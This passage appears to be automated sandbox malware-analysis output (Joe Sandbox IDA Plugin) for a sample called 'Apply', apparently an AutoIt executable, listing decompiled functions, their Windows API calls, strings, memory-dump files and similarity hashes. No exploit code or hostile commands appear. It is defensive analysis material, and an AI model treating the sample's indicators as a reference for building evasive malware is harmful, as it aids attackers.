IsMenu.USER32(00000000), ref: 008BC41E
CreatePopupMenu.USER32 ref: 008BC454
GetMenuItemCount.USER32(01589310), ref: 008BC4A5
InsertMenuItemW.USER32(01589310,?,00000001,00000030), ref: 008BC4CD

Strings

2, xrefs: 008BC438
0, xrefs: 008BC3A9

Memory Dump Source

Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true

Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_850000_Apply.jbxd

Similarity

API ID: Menu$Item$CountCreateInfoInsertPopup
String ID: 0$2
API String ID: 93392585-3793063076
Opcode ID: 2f0cb87bc75886c3dcc23e1406b70cec3d7e619b82495c109ce70b78d4e0f113
Instruction ID: 426f4e97a2520e467422ea2809b51accce204fe1c0c92bb8b015aec3e115f20f
Opcode Fuzzy Hash: 2f0cb87bc75886c3dcc23e1406b70cec3d7e619b82495c109ce70b78d4e0f113
Instruction Fuzzy Hash: 29518D706002059BDB20CFA8D994BFEBBF4FF45314F148159E815EB391D7709A45CB65

Function 008BCE59 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 81windowCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000000,00007F03), ref: 008BCEF8

Strings

question, xrefs: 008BCEB1
stop, xrefs: 008BCEC9
warning, xrefs: 008BCEE1
info, xrefs: 008BCE99
blank, xrefs: 008BCE7A

Memory Dump Source

Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true

Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_850000_Apply.jbxd

Similarity

API ID: IconLoad
String ID: blank$info$question$stop$warning
API String ID: 2457776203-404129466
Opcode ID: 30dde1e4d616ea9fe1b00ceb35ab813fb9f3db8c1c623fc0de5dd2f90bd6ede9
Instruction ID: 8c70159bf5bb937883cdd767c2867be2c01fd5d231dc02d26ea789d44faf43ad
Opcode Fuzzy Hash: 30dde1e4d616ea9fe1b00ceb35ab813fb9f3db8c1c623fc0de5dd2f90bd6ede9
Instruction Fuzzy Hash: E111903124C74BBAA7125B94DC82DFF67ACFF05364B60406AF504E63C2EBB0E9404565

Function 008BE468 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 70networkCOMMON

Download Yara Rule

APIs

WSAStartup.WSOCK32(00000101,?), ref: 008BE483
gethostname.WSOCK32(?,00000100), ref: 008BE49D
gethostbyname.WSOCK32(?), ref: 008BE4AA
inet_ntoa.WSOCK32(?), ref: 008BE4EC
_strcat.LIBCMT ref: 008BE4FA
WSACleanup.WSOCK32 ref: 008BE51F

Strings

0.0.0.0, xrefs: 008BE4C8

Memory Dump Source

Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true

Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_850000_Apply.jbxd

Similarity

API ID: CleanupStartup_strcatgethostbynamegethostnameinet_ntoa
String ID: 0.0.0.0
API String ID: 642191829-3771769585
Opcode ID: 54d69ed0a5dbe09475060d8ac3470081cbfce5da05dcd57610bb0be5ecbe82f7
Instruction ID: 2c0fe0522c81951d7835d1cda64c7621cb021dec977ba68fe053e226ad0a3663
Opcode Fuzzy Hash: 54d69ed0a5dbe09475060d8ac3470081cbfce5da05dcd57610bb0be5ecbe82f7
Instruction Fuzzy Hash: FF110331904218AFCB30AB74DC4AEEE77BCFF41714F0001A5F149DA192EF71DA858A62

Function 008EA672 Relevance: 12.3, APIs: 8, Instructions: 260windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00869DD1: GetWindowLongW.USER32(00000000,000000EB), ref: 00869DE2

GetSystemMetrics.USER32(0000000F), ref: 008EA6B3
GetSystemMetrics.USER32(0000000F), ref: 008EA6D3
MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 008EA910
SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 008EA92E
SendMessageW.USER32(00000003,00000469,?,00000000), ref: 008EA94F
ShowWindow.USER32(00000003,00000000), ref: 008EA96E
InvalidateRect.USER32(?,00000000,00000001), ref: 008EA993
DefDlgProcW.USER32(?,00000005,?,?), ref: 008EA9B6

Memory Dump Source

Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true

Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_850000_Apply.jbxd

Similarity

API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
String ID:
API String ID: 1211466189-0
Opcode ID: c0cb0579383e9efe795262ab2eff9d60288e31b7f84b876d60ba2c077e01d4d3
Instruction ID: 97484ccef424f736bc2fc5009d044b0756e38ffdb53607c671a015f9771f7518
Opcode Fuzzy Hash: c0cb0579383e9efe795262ab2eff9d60288e31b7f84b876d60ba2c077e01d4d3
Instruction Fuzzy Hash: A8B19B35600259EFDF18CF2AC9C47AA7BB2FF45B00F098069EC95DE296D730A945CB61

Function 008BF35A Relevance: 12.1, APIs: 8, Instructions: 137timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32 ref: 008BF36B
_wcslen.LIBCMT ref: 008BF37C
_wcslen.LIBCMT ref: 008BF3BA
_wcslen.LIBCMT ref: 008BF3F0
_wcslen.LIBCMT ref: 008BF420
_wcslen.LIBCMT ref: 008BF430
_wcslen.LIBCMT ref: 008BF46C
_wcslen.LIBCMT ref: 008BF49B

Memory Dump Source

Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true

Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_850000_Apply.jbxd

Similarity

API ID: _wcslen$LocalTime
String ID:
API String ID: 952045576-0
Opcode ID: 91fcdf6ee24ecfc2ee80f5eed244ebeef4275e3fd14f64e61320359001749f6e
Instruction ID: 226135f3f47fe9e13930d045784732c6e2831b218e7660fc0b0214ffc8979b85
Opcode Fuzzy Hash: 91fcdf6ee24ecfc2ee80f5eed244ebeef4275e3fd14f64e61320359001749f6e
Instruction Fuzzy Hash: 6F4130A6C1161876CB11ABE88C469CFB7B8FF15310F50C466E61CE3226FB34D655C3AA

Function 0086F596 Relevance: 12.1, APIs: 8, Instructions: 124COMMON

Download Yara Rule

APIs

ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,00892A40,00000004,00000000,00000000), ref: 0086F611
ShowWindow.USER32(FFFFFFFF,00000006,?,00000000,?,00892A40,00000004,00000000,00000000), ref: 008AF980
ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,00892A40,00000004,00000000,00000000), ref: 008AFA03

Memory Dump Source

Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true

Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_850000_Apply.jbxd

Similarity

API ID: ShowWindow
String ID:
API String ID: 1268545403-0
Opcode ID: 307ff55a0df6b76d25afa4aec225b0cc48a198ed7f32a2071f0a7cb24c10d5b8
Instruction ID: ae598248dd33a8f649d2216154c621f0ced6378916f1f98689e1a16400831670
Opcode Fuzzy Hash: 307ff55a0df6b76d25afa4aec225b0cc48a198ed7f32a2071f0a7cb24c10d5b8
Instruction Fuzzy Hash: B941F670608380AAD7359B39E989B6A7F92FF66314F1A443CE247C6977C631E884DB11

Function 008A6EAD Relevance: 12.1, APIs: 8, Instructions: 117windowCOMMON

Download Yara Rule

APIs

LoadImageW.USER32(00000000,?,?,00000010,00000010,00000010), ref: 008A6F36
ExtractIconExW.SHELL32(?,?,00000000,00000000,00000001), ref: 008A6F4F
LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 008A6F5F
ExtractIconExW.SHELL32(?,?,?,00000000,00000001), ref: 008A6F77
SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 008A6F98
DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00868E0E,00000000,00000000,00000000,000000FF,00000000), ref: 008A6FA7
SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 008A6FC4
DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00868E0E,00000000,00000000,00000000,000000FF,00000000), ref: 008A6FD3

Memory Dump Source

Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true

Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_850000_Apply.jbxd

Similarity

API ID: Icon$DestroyExtractImageLoadMessageSend
String ID:
API String ID: 1268354404-0
Opcode ID: 6d91de33cede4fbda3a9e03aa1852c7613c034e55bbe0b23a44b7400d5335c27
Instruction ID: c50fa281b4bdf9d291575665e3ce82fa3c4ea11fc470f7875363a5b6b51a4f85
Opcode Fuzzy Hash: 6d91de33cede4fbda3a9e03aa1852c7613c034e55bbe0b23a44b7400d5335c27
Instruction Fuzzy Hash: 9441AD30600345AFEB21CF24DC85BAA7BB4FB46710F080659FA95DB6E0EB72E954DB50

Function 008E34C1 Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 008E34D9
GetDC.USER32(00000000), ref: 008E34E1
GetDeviceCaps.GDI32(00000000,0000005A), ref: 008E34EC
ReleaseDC.USER32(00000000,00000000), ref: 008E34F8
CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 008E3534
SendMessageW.USER32(?,00000030,00000000,00000001), ref: 008E3545
MoveWindow.USER32(?,?,?,?,?,00000000,?,?,008E6225,?,?,000000FF,00000000,?,000000FF,?), ref: 008E3580
SendMessageW.USER32(?,00000142,00000000,00000000), ref: 008E359F

Memory Dump Source

Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true

Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_850000_Apply.jbxd

Similarity

API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
String ID:
API String ID: 3864802216-0
Opcode ID: e4717beeb3820a9acb3cf8d001d3514a48b8fabff32b724d5e4d0c7a4168487e
Instruction ID: 6f494e30b144ff43abedab71183883502d4b7c7fb0f0205824659e0cbcec5053
Opcode Fuzzy Hash: e4717beeb3820a9acb3cf8d001d3514a48b8fabff32b724d5e4d0c7a4168487e
Instruction Fuzzy Hash: B6317672201294BFEB218F558C8AFEB3BA9FF4A711F044065FE08DE291D6759D41CBA4

Function 008D5735 Relevance: 10.9, APIs: 4, Strings: 2, Instructions: 359COMMON

Download Yara Rule

Strings

Not an Object type, xrefs: 008D578E
NULL Pointer assignment, xrefs: 008D57B5, 008D5B0A

Memory Dump Source

Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true

Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_850000_Apply.jbxd

Similarity

API ID:
String ID: NULL Pointer assignment$Not an Object type
API String ID: 0-572801152
Opcode ID: 6a4649d762ec690009cdeed0a7e817cbf6286e96aad11464fecaaf5f02fd176f
Instruction ID: 4a772fd65627000dc542eb18789459dc363423f6a8bed43b2b1ca50a5fbed48e
Opcode Fuzzy Hash: 6a4649d762ec690009cdeed0a7e817cbf6286e96aad11464fecaaf5f02fd176f
Instruction Fuzzy Hash: 15D18D71A0061AAFDB10DF68C881AAEB7B5FF48314F14866BE915EB381E770ED45CB50

Function 00891872 Relevance: 10.8, APIs: 7, Instructions: 268COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32(00000000,00000000,?,7FFFFFFF,?,?,00891B4B,00000000,00000000,?,00000000,?,?,?,?,00000000), ref: 0089191E
MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,00891B4B,00000000,00000000,?,00000000,?,?,?,?), ref: 008919A1
MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00891B4B,?,00891B4B,00000000,00000000,?,00000000,?,?,?,?), ref: 00891A34
MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,00891B4B,00000000,00000000,?,00000000,?,?,?,?), ref: 00891A4B

Part of subcall function 00883B70: RtlAllocateHeap.NTDLL(00000000,?,?,?,00876A59,?,0000015D,?,?,?,?,00878590,000000FF,00000000,?,?), ref: 00883BA2

MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,00891B4B,00000000,00000000,?,00000000,?,?,?,?), ref: 00891AC7
__freea.LIBCMT ref: 00891AF2
__freea.LIBCMT ref: 00891AFE

Memory Dump Source

Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true

Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_850000_Apply.jbxd

Similarity

API ID: ByteCharMultiWide$__freea$AllocateHeapInfo
String ID:
API String ID: 2829977744-0
Opcode ID: bba68b8fc1c9024022d184409d11d1bdcd33c4083b9056e348bb846331190980
Instruction ID: 80dbb933fc00a66e1a4cb6276bb68d13fe5fe19f8b064f55d221a736fe5ee081
Opcode Fuzzy Hash: bba68b8fc1c9024022d184409d11d1bdcd33c4083b9056e348bb846331190980
Instruction Fuzzy Hash: 6D91B272E0921B9EDF21AA64C899AEEBBE5FF09714F5C0129E805E7240D724DD40C760

Function 008D4CAA Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 262COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 008D4DCF
VariantInit.OLEAUT32(?), ref: 008D4ED0
VariantClear.OLEAUT32(?), ref: 008D4EDA
VariantClear.OLEAUT32(?), ref: 008D4F37

Strings

Incorrect Object type in FOR..IN loop, xrefs: 008D4EB3
Null Object assignment in FOR..IN loop, xrefs: 008D4D5F, 008D4E8D, 008D4F45

Memory Dump Source

Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true

Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_850000_Apply.jbxd

Similarity

API ID: Variant$ClearInit
String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
API String ID: 2610073882-625585964
Opcode ID: a4dbc920ac36783716c1532cd490fab212d35857ab587e49993e43f5d335c12a
Instruction ID: d6e99016f02e1c3f8c6f8277ad7c3945a00f6975fc3d2d56719db19dbcac5e05
Opcode Fuzzy Hash: a4dbc920ac36783716c1532cd490fab212d35857ab587e49993e43f5d335c12a
Instruction Fuzzy Hash: 45918371A00219ABDF20CFA4C884FAE7BB8FF45728F10865AF515EB280D7709945CF60

Function 008696C0 Relevance: 10.8, APIs: 7, Instructions: 254COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true

Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_850000_Apply.jbxd

Similarity

API ID: ObjectSelect$BeginCreatePath
String ID:
API String ID: 3225163088-0
Opcode ID: b7b0f215447ae1700e62ac66eced45156e21d74c1e2ed53a3b21704e8b6b3b94
Instruction ID: 4361f0d19cd616c37d1825d78a7c413a4e18090ad4ce556c9e6480a2181dde9b
Opcode Fuzzy Hash: b7b0f215447ae1700e62ac66eced45156e21d74c1e2ed53a3b21704e8b6b3b94
Instruction Fuzzy Hash: F2913571D00219AFCB10CFA9CC84AEEBBB9FF49320F158159E555FB291D778A941CB60

Function 008C1870 Relevance: 10.8, APIs: 7, Instructions: 254COMMON

Download Yara Rule

APIs

SafeArrayGetVartype.OLEAUT32(00000001,?), ref: 008C1945
SafeArrayAccessData.OLEAUT32(00000000,?), ref: 008C196D
SafeArrayUnaccessData.OLEAUT32(00000001), ref: 008C1991
SafeArrayAccessData.OLEAUT32(00000001,?), ref: 008C19C1
SafeArrayAccessData.OLEAUT32(00000001,?), ref: 008C1A48
SafeArrayAccessData.OLEAUT32(00000001,?), ref: 008C1AAD
SafeArrayAccessData.OLEAUT32(00000001,?), ref: 008C1B19

Memory Dump Source

Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true

Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_850000_Apply.jbxd

Similarity

API ID: ArraySafe$Data$Access$UnaccessVartype
String ID:
API String ID: 2550207440-0
Opcode ID: d7b6d4d821afa242490dd7417580c4eea0b63ef6fc7ffbf204a15e8e34cbb69e
Instruction ID: acb645475b2c2fc991a0f9959d07e35fdff28e93d831e94065599b6ca9b55057
Opcode Fuzzy Hash: d7b6d4d821afa242490dd7417580c4eea0b63ef6fc7ffbf204a15e8e34cbb69e
Instruction Fuzzy Hash: EA91AC75A002199FDF019F98D8C8FAEBBB4FF06725F144019E901EB292E774E945CB91

Function 008D40CE Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 240COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 008D40F2
CharUpperBuffW.USER32(?,?), ref: 008D4201
_wcslen.LIBCMT ref: 008D4211
VariantClear.OLEAUT32(?), ref: 008D43A6

Part of subcall function 008C13C8: VariantInit.OLEAUT32(00000000), ref: 008C1408
Part of subcall function 008C13C8: VariantCopy.OLEAUT32(?,?), ref: 008C1411
Part of subcall function 008C13C8: VariantClear.OLEAUT32(?), ref: 008C141D

Strings

Incorrect Parameter format, xrefs: 008D412D, 008D4328
AUTOIT.ERROR, xrefs: 008D4207, 008D420C

Memory Dump Source

Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true

Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_850000_Apply.jbxd

Similarity

API ID: Variant$ClearInit$BuffCharCopyUpper_wcslen
String ID: AUTOIT.ERROR$Incorrect Parameter format
API String ID: 4137639002-1221869570
Opcode ID: 618ebea2458941f645a4f0d22b599e9e6de600329843e1f2feaa59818ae6039a
Instruction ID: e1218cddb979f1e93b52c501cab34d32d57b0b8dc1e3368b119b8afa726a3d61
Opcode Fuzzy Hash: 618ebea2458941f645a4f0d22b599e9e6de600329843e1f2feaa59818ae6039a
Instruction Fuzzy Hash: 0E9113746083059FCB04DF28C48196AB7E5FB89714F148A2EF89ADB351DB31ED49CB92

Function 008D5334 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 236COMMON

Download Yara Rule

APIs

Part of subcall function 008B0695: CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,008B05C8,80070057,?,?,?,008B09E5), ref: 008B06B2
Part of subcall function 008B0695: ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,008B05C8,80070057,?,?), ref: 008B06CD
Part of subcall function 008B0695: lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,008B05C8,80070057,?,?), ref: 008B06DB
Part of subcall function 008B0695: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,008B05C8,80070057,?), ref: 008B06EB

CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,00000001,?,?), ref: 008D53D8
_wcslen.LIBCMT ref: 008D54E0
CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 008D5556
CoTaskMemFree.OLE32(?), ref: 008D5561

Strings

NULL Pointer assignment, xrefs: 008D55AA, 008D55D9

Memory Dump Source

Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true

Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_850000_Apply.jbxd

Similarity

API ID: FreeFromProgTask$CreateInitializeInstanceSecurity_wcslenlstrcmpi
String ID: NULL Pointer assignment
API String ID: 614568839-2785691316
Opcode ID: 5d1314799af3d3d9daf93ac92ada7cad2cf4f62fbef57f357d4a980948701f03
Instruction ID: 67d5cc532a1f9d0904270ada50905c2ebe4fb4b4f121dd42eaf2844393e24ef1
Opcode Fuzzy Hash: 5d1314799af3d3d9daf93ac92ada7cad2cf4f62fbef57f357d4a980948701f03
Instruction Fuzzy Hash: 5E910671D002199FDF15DFA8D881AEEB7B9FF08314F10866AE915AB251DB309A488F61

Function 008E28B8 Relevance: 10.7, APIs: 7, Instructions: 196windowCOMMON

Download Yara Rule

APIs

GetMenu.USER32(?), ref: 008E293E
GetMenuItemCount.USER32(00000000), ref: 008E2970
GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 008E2998
_wcslen.LIBCMT ref: 008E29CE
GetMenuItemID.USER32(?,?), ref: 008E2A08
GetSubMenu.USER32(?,?), ref: 008E2A16

Part of subcall function 008B4128: GetWindowThreadProcessId.USER32(?,00000000), ref: 008B4142
Part of subcall function 008B4128: GetCurrentThreadId.KERNEL32 ref: 008B4149
Part of subcall function 008B4128: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,008B2C95), ref: 008B4150

PostMessageW.USER32(?,00000111,00000000,00000000), ref: 008E2A9E

Part of subcall function 008BEFBC: Sleep.KERNEL32 ref: 008BF034

Memory Dump Source

Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true

Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_850000_Apply.jbxd

Similarity

